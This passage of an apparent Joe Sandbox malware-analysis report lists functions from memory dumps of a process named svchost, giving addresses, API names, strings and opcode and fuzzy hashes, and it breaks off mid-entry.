            • Instruction Fuzzy Hash: B1F04911F1E10780FF6BBB72585117502A0AF5B7ACF988630C97E862F2EF1CF4929610
            Function 00007FFA4187B708 Relevance: 1.7, APIs: 1, Instructions: 194COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: a90ba9f02f9fd4960b28bf92607e1af1b77d2959c4ed5fc28795b5da87eefb9a
            • Instruction ID: 953e757904af675be5c414d106b2a122d544edc66dab1c77ae50e85992855349
            • Opcode Fuzzy Hash: a90ba9f02f9fd4960b28bf92607e1af1b77d2959c4ed5fc28795b5da87eefb9a
            • Instruction Fuzzy Hash: FE71CF32E0C2424AFB67BB65998527A66D2FFC3384F14C435DA2E167B5DE3CF8418604
            Function 00007FFA41879A94 Relevance: 1.6, APIs: 1, Instructions: 113COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 2e84ece921895406fdef6938223af951c0da4b3c25055168f37ffc70fcd32a18
            • Instruction ID: d8b7b28d80527d6af7007df4c29a2dc469d5c35e6b7ee327ae88140493ba1f07
            • Opcode Fuzzy Hash: 2e84ece921895406fdef6938223af951c0da4b3c25055168f37ffc70fcd32a18
            • Instruction Fuzzy Hash: 8041CC32A0D20187EB27EB28A95027977E4EB57B60F548531DAAE836A1CF2CF402C751
            Function 00007FFA4187A7E8 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5cecc257144e4e27949d86f4c99194fbcb84acce64af393fa4c425b844cf5a23
            • Instruction ID: f6af59c12f31ba420189972c215c0fb6f889a34e69b04f8672ef0c9cb4d474ad
            • Opcode Fuzzy Hash: 5cecc257144e4e27949d86f4c99194fbcb84acce64af393fa4c425b844cf5a23
            • Instruction Fuzzy Hash: 3F31AC26E1C65285F757BF15984137C26A0AF42B94F958239EA2D533F2CFBCF8828711
            Function 00007FFA41884B50 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5b86d15f88d074e77b11a30457639f6e007144b2872ab35b64636c2b2c5ca410
            • Instruction ID: 32093746dbb1fc019d788fd1b8a92fbbfee7e7ad4a7e857f911c041a44111888
            • Opcode Fuzzy Hash: 5b86d15f88d074e77b11a30457639f6e007144b2872ab35b64636c2b2c5ca410
            • Instruction Fuzzy Hash: 90218433A0CA8187D763AF58E44077977A1EB86B94F648234EA5D876E9DF3CE400CB00
            Function 00007FFA418693D8 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5cb7b1feb9b43db1098235879318ebf0376573b7b6df1c2cd61902e527f68d3e
            • Instruction ID: d1406834a679d5427ed0b792c387b538452525657a3eef9e9cf86c7560d7760e
            • Opcode Fuzzy Hash: 5cb7b1feb9b43db1098235879318ebf0376573b7b6df1c2cd61902e527f68d3e
            • Instruction Fuzzy Hash: 4D018E21A0C79545EB07AB62A940169A691AF87FE0F988634EE6C13BE6CE3CF5014300
            Function 00007FFA4186E0B0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 4d0cebdd5390d01fd6a81d2093c95c750d9d331ee448a874a7ec04b3be5c555d
            • Instruction ID: c9730722b3c0550956b788a04203080acc85a187aaed94d60fb10e1fa0c2ee25
            • Opcode Fuzzy Hash: 4d0cebdd5390d01fd6a81d2093c95c750d9d331ee448a874a7ec04b3be5c555d
            • Instruction Fuzzy Hash: FB017C62B0EA4699EF07EB50E6452BCA2A0AF06B84FD4C035C61C063A5EE2CF8948310
            Function 00007FFA418728D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • RtlAllocateHeap.NTDLL(?,?,?,00007FFA4187B0BD,?,?,00000000,00007FFA4187BADF,?,?,?,00007FFA4187226B,?,?,?,00007FFA41872161), ref: 00007FFA4187290E
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 0c937c045c7e1eb94fbeedb88f0348d564f3251b54991164d1961001a4aaec9b
            • Instruction ID: ce43001941372143a8943f1f20e973fcf75697e2f3d0bad688daf36399577351
            • Opcode Fuzzy Hash: 0c937c045c7e1eb94fbeedb88f0348d564f3251b54991164d1961001a4aaec9b
            • Instruction Fuzzy Hash: 0EF03410E0D20641FB27B7A26C51BB453C24F877E0F4C8234E93E862F2EE2CB4808220
            Function 00007FFA41868CF0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 4ff3df62cc57fa8db39030fbf527b6171d4d0221553f6a3751272f53060b5813
            • Instruction ID: 39cd9ad4675c134f88151db35f339054de6c56a4a983021ed867a5882bce00e4
            • Opcode Fuzzy Hash: 4ff3df62cc57fa8db39030fbf527b6171d4d0221553f6a3751272f53060b5813
            • Instruction Fuzzy Hash: 98E02231A1DA8685FB273BB4A18057C61609F237F4FA4C330EA3C032E5DE38B8508220
            Function 00007FFA41870860 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: cae8df84b8d7a562aee2e6675108a7fbbdd700c0eca3694e76a62b9b5b9b91ca
            • Instruction ID: d7d8a38619cd8c9010937b4cfdff08415c8392ad832b6aa325037ca2a4c9fba9
            • Opcode Fuzzy Hash: cae8df84b8d7a562aee2e6675108a7fbbdd700c0eca3694e76a62b9b5b9b91ca
            • Instruction Fuzzy Hash: 48E0ED61E0E1428AFB177BA09C41BBD12D05F43700FE0C134D95D962E2CE3D78026762
            Function 00007FFA417EAB00 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_global_init
            • String ID:
            • API String ID: 3035275971-0
            • Opcode ID: c43d3f8e08e96f86841b2bc61319f4f09dc47221fa76fdc1bbfa25a8b61713f7
            • Instruction ID: 88ca34b5ff22e3cb0abf0b8bd064a8071cf23e494ba577be3c16ec48f4e02523
            • Opcode Fuzzy Hash: c43d3f8e08e96f86841b2bc61319f4f09dc47221fa76fdc1bbfa25a8b61713f7
            • Instruction Fuzzy Hash: 66C01289E0C28299FB07332098053202BE2AB26318F848278C10E012B2AF5C22898701

            Non-executed Functions

            Function 00007FFA417EA3E0 Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 313COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_easy_setopt$curl_easy_cleanupcurl_easy_initcurl_easy_performcurl_easy_strerror
            • String ID: Content type is not downloadable or response code is not OK$Failed to Initialize cURL$File could not be created.$application/octet-stream$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$text/plain; charset=utf-8
            • API String ID: 2825223466-4018419100
            • Opcode ID: d85913f9b69b27529117e5d785c89d233f765071da7242c062c0a4f409c0731e
            • Instruction ID: 62d1dca99593365c97206ebab7839160746d68e2a0bee88c951a0a3988e2ee2e
            • Opcode Fuzzy Hash: d85913f9b69b27529117e5d785c89d233f765071da7242c062c0a4f409c0731e
            • Instruction Fuzzy Hash: 0DE14D22A1CB8185EB13EB35D5806BD37B0FB86B88F558235DE0E57A66EF38E145C740
            Function 6828C220 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 239stringCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocale$free$_strdupstrchr$strcmp
            • String ID: LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX
            • API String ID: 1324643423-2921774448
            • Opcode ID: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
            • Instruction ID: 47771d90c868ec4dc4df9a16ed7766f050a57d903592d0e8c9a412a42eccd3e3
            • Opcode Fuzzy Hash: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
            • Instruction Fuzzy Hash: 7571F3F174220E55EE898726B8103392253AB45F99FC88639CD3E5A7D4EF3DC49AC310
            Function 00007FFA4185014C Relevance: 27.2, APIs: 18, Instructions: 229fileCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
            • String ID:
            • API String ID: 2398595512-0
            • Opcode ID: 8e69e2400c678896474a71e5a9b84d5d55e522ced736dbd8aeb9ea0d45dac52e
            • Instruction ID: ee35db549e31f25ecad757914f788a1c377ce6bf48891497318272318c73b863
            • Opcode Fuzzy Hash: 8e69e2400c678896474a71e5a9b84d5d55e522ced736dbd8aeb9ea0d45dac52e
            • Instruction Fuzzy Hash: 2A916131B1CA4246EB67AF25A84467A2690EF477B8F548334D9AE47AF5DF3CF4058700
            Function 00007FFA417F6130 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 357COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: parse_error$value
            • API String ID: 1944019136-1739288027
            • Opcode ID: f0f8ab8c36cb6c1bb4624754cf3233d71eef0d88a99854f693065c0915c1428f
            • Instruction ID: fc9bfeed26b08510428575f5905fe4945ab47f7b20069c34a188b4d005b8d221
            • Opcode Fuzzy Hash: f0f8ab8c36cb6c1bb4624754cf3233d71eef0d88a99854f693065c0915c1428f
            • Instruction Fuzzy Hash: EEE1E662F1CA4295EB13EB74D4802EE6371EB56398F408231EA4D47AE7EF6CE144C744
            Function 68283500 Relevance: 19.1, APIs: 15, Instructions: 372stringCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$malloc
            • String ID:
            • API String ID: 3157260142-0
            • Opcode ID: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
            • Instruction ID: 0534087b0e701903961d93f7aa28f9b970e5e5cf5cb79d7fc815b1099d6b10dc
            • Opcode Fuzzy Hash: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
            • Instruction Fuzzy Hash: 67E180B7719AC982DF24CB19E45835EB6A1F785B88F848525CEE957B88DF3DC049C700
            Function 00007FFA417FE810 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 250COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy
            • String ID: invalid_iterator
            • API String ID: 3630682930-2508626007
            • Opcode ID: 397537d3d4378fa5c54376e807f2bd53a57192dd083d56d661d1957e75eec541
            • Instruction ID: ef0b07f788514b3fe59546b87ff885bfdcc7a0bd32911a570840c73880e96ff3
            • Opcode Fuzzy Hash: 397537d3d4378fa5c54376e807f2bd53a57192dd083d56d661d1957e75eec541
            • Instruction Fuzzy Hash: 8BA1B222F1CB4585EB12EF65D4402AD6371EB4A7A4F508331EA6D13BE6EF7CE0958740
            Function 68287D70 Relevance: 13.6, APIs: 9, Instructions: 69stringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 6828C220: strchr.MSVCRT ref: 6828C257
              • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C269
              • Part of subcall function 6828C220: _strdup.MSVCRT(?,?,?,?,?,?,68287D85), ref: 6828C27A
              • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C2AC
              • Part of subcall function 6828C220: free.MSVCRT(?,?,?,?,?,?,68287D85), ref: 6828C2CE
            • strchr.MSVCRT ref: 68287D90
            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 68287DB0
            • strcmp.MSVCRT ref: 68287DD2
            • strncpy.MSVCRT ref: 68287DEF
            • EnumSystemLocalesA.KERNEL32 ref: 68287E11
            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68287E28
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocalestrchr$EnumLocalesSystem_strdupfreepthread_mutex_lockpthread_mutex_unlockstrcmpstrncpy
            • String ID:
            • API String ID: 3715319363-0
            • Opcode ID: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
            • Instruction ID: 30c4b0ccd22984e49effa0c280e7d9621567dd064359c0b416f4409a9f50fb22
            • Opcode Fuzzy Hash: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
            • Instruction Fuzzy Hash: DC217FB871110BC6FF04DB67ECA477523A3BB45795FC48626C52A872E0EF69C8A88340
            Function 00007FFA417EED60 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 448COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
